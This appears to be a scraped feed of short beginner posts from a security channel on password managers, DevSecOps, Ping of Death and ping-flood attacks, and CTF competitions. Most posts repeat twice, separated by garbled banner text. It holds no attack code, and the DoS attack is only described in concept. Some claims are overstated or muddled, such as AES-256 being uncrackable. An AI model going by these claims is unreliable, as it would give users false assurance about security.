1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DevSecOps?
#Forbeginers :)))
DevSecOps is security as a code culture where you integrate security tools into the DevOps lifecycle.
Security as part of the DevOps process is the only way to mitigate risk.
It is a transformational shift that includes the culture, practices, and security tools at every stage of the DevOps process.
It removes silos between development, security, and admin teams.
It follows a 'shift to the left' approach, which means implementing security processes early in the design / planning phase to provide security awareness for development and administration teams and meet cybersecurity requirements.
Here's how DevSecOps is implemented:
Security and development team collaboration on a threat model
Integration of security tools into the development pipeline
Prioritize security requirements as part of the product backlog
Reviewing infrastructure-related security policies prior to deployment
Security experts evaluate automated tests.
Modern technological innovation plays a vital role in DevSecOps.
Security as code, compliance as code, and infrastructure as code can eliminate many of the manual security steps and improve overall efficiency.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DevSecOps?
#Forbeginers :)))
DevSecOps is security as a code culture where you integrate security tools into the DevOps lifecycle.
Security as part of the DevOps process is the only way to mitigate risk.
It is a transformational shift that includes the culture, practices, and security tools at every stage of the DevOps process.
It removes silos between development, security, and admin teams.
It follows a 'shift to the left' approach, which means implementing security processes early in the design / planning phase to provide security awareness for development and administration teams and meet cybersecurity requirements.
Here's how DevSecOps is implemented:
Security and development team collaboration on a threat model
Integration of security tools into the development pipeline
Prioritize security requirements as part of the product backlog
Reviewing infrastructure-related security policies prior to deployment
Security experts evaluate automated tests.
Modern technological innovation plays a vital role in DevSecOps.
Security as code, compliance as code, and infrastructure as code can eliminate many of the manual security steps and improve overall efficiency.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is ping of death ?
#forbeginers
Ping of Death is a type of Denial of Service ( DoS) attack in which, by sending malformed or oversized packets using a simple ping order, an attacker attempts to crash, destabilize, or freeze the targeted device or service.
While PoD attacks are leveraging legacy flaws in target systems that may have been patched. The attack is still important and dangerous in an unpatched scheme, however. A new form of PoD attack has become common recently. The targeted device is hit by this attack, commonly known as a Ping flood, with ICMP packets sent rapidly via ping without waiting for replies.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is ping of death ?
#forbeginers
Ping of Death is a type of Denial of Service ( DoS) attack in which, by sending malformed or oversized packets using a simple ping order, an attacker attempts to crash, destabilize, or freeze the targeted device or service.
While PoD attacks are leveraging legacy flaws in target systems that may have been patched. The attack is still important and dangerous in an unpatched scheme, however. A new form of PoD attack has become common recently. The targeted device is hit by this attack, commonly known as a Ping flood, with ICMP packets sent rapidly via ping without waiting for replies.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is CTF?
#forBeginers
A) CTF (Capture The Flag) is a kind of information security competition that challenges contestants to solve a variety of tasks ranging from a scavenger hunt on wikipedia to basic programming exercises, to hacking your way into a server to steal data. In these challenges, the contestant is usually asked to find a specific piece of text that may be hidden on the server or behind a webpage. This goal is called the flag, hence the name!
B) Like many competitions, the skill level for CTFs varies between the events. Some are targeted towards professionals with experience operating on cyber security teams. These typically offer a large cash reward and can be held at a specific physical location. Other events target the high school and college student range, sometimes offering monetary support for education to those that place highly in the competition!
C) CTFtime details the different types of CTF. To summarize, Jeopardy style CTFs provide a list of challenges and award points to individuals or teams that complete the challenges, groups with the most points wins. Attack/Defense style CTFs focus on either attacking an opponent's servers or defending one's own. These CTFs are typically aimed at those with more experience and are conducted at a specific physical location.
CTFs can be played as an individual or in teams so feel free to get your friends onboard!
I'd like to stress that CTFs are available to everyone. Many challenges do not require programming knowledge and are simply a matter of problem solving and creative thinking.
π¦Challenge types :
1) Jeopardy style CTFs challenges are typically divided into categories. I'll try to briefly cover the common ones.
2) Cryptography - Typically involves decrypting or encrypting a piece of data
3) Steganography - Tasked with finding information hidden in files or images
4) Binary - Reverse engineering or exploiting a binary file
5) Web - Exploiting web pages to find the flag
6) Pwn - Exploiting a server to find the flag
(some wifi resources)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is CTF?
#forBeginers
A) CTF (Capture The Flag) is a kind of information security competition that challenges contestants to solve a variety of tasks ranging from a scavenger hunt on wikipedia to basic programming exercises, to hacking your way into a server to steal data. In these challenges, the contestant is usually asked to find a specific piece of text that may be hidden on the server or behind a webpage. This goal is called the flag, hence the name!
B) Like many competitions, the skill level for CTFs varies between the events. Some are targeted towards professionals with experience operating on cyber security teams. These typically offer a large cash reward and can be held at a specific physical location. Other events target the high school and college student range, sometimes offering monetary support for education to those that place highly in the competition!
C) CTFtime details the different types of CTF. To summarize, Jeopardy style CTFs provide a list of challenges and award points to individuals or teams that complete the challenges, groups with the most points wins. Attack/Defense style CTFs focus on either attacking an opponent's servers or defending one's own. These CTFs are typically aimed at those with more experience and are conducted at a specific physical location.
CTFs can be played as an individual or in teams so feel free to get your friends onboard!
I'd like to stress that CTFs are available to everyone. Many challenges do not require programming knowledge and are simply a matter of problem solving and creative thinking.
π¦Challenge types :
1) Jeopardy style CTFs challenges are typically divided into categories. I'll try to briefly cover the common ones.
2) Cryptography - Typically involves decrypting or encrypting a piece of data
3) Steganography - Tasked with finding information hidden in files or images
4) Binary - Reverse engineering or exploiting a binary file
5) Web - Exploiting web pages to find the flag
6) Pwn - Exploiting a server to find the flag
(some wifi resources)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β